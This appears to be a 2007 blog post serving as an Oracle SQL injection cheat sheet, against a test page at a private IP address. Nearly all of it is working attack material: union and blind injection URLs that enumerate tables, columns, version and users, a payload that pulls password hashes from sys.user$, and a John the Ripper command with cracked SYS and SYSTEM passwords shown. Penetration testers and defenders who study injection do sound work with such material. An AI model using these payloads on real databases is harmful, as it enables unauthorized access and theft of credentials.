SQL Injection In Oracle

July 11, 2007

1. Finding table names

select table_name from+user_tables

Example:-

http://192.168.2.199/ora.php?id=101+union+all+select+

table_name+from+user_tables

Blind Injection:http://192.168.2.199/ora.php?id=101 and

ascii(substr((select+table_name+from+user_tables

where rownum=1),1,1))>100

———————————————–

2. Iterating through the different rows:

Unfortunately it is not as straight forward, there is no LIMIT command in oracle.

Syntax:-select column_1, column_2 from (select rownum r_, column_1,

column_2  from table_1, table_2  where field_3 =

'some value')where r_ =2

EXAMPLE:-

http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME

+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM

+USER_TABLES)+WHERE+R=1

————————————————————————–

3. Finding column names:

select+column_name+from+user_tab_columns

————————————————————————–

4. Finding Version:

Select banner from v$version

———————————————————————–

5. Finding  Database user names:-
http://192.168.2.199/ora.php?id=101+union+

all+select+username,null+from+all_users

———————————————————————

6. Finding password  hashes (the user in connection string should be a dba):

select name,astatus, password from sys.user$ where astatus =0;

<# a status =0 indicates only the users who are not locked)

example:-http://192.168.2.199/ora.php?id=101+union

+all+select+name||'–'||password+from+sys.user$

In the above example: i had only one column to select a string from database, so i had concatenated the

username and password field together separated with '–'.

—————————————————————————-

7. Cracking passwords using john the ripper:-

thanks to pentestmonkey for this

$ ./john –rules –wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt–format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])DIP              (DIP)ORACLE           (FLOWS_020100)ORACLE           (FLOWS_FILES)ORACLE           (XDB)ORACLE           (CTXSYS)PASSWORD         (HR)PASSWORD         (SYSTEM)PASSWORD         (SYS)TEST             (TEST2)TEST1            (TEST1)
——————————————————————————
what else you want from a SQL Injection Furious

SQL Injection In Ingres

SQL Injection In DB2

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback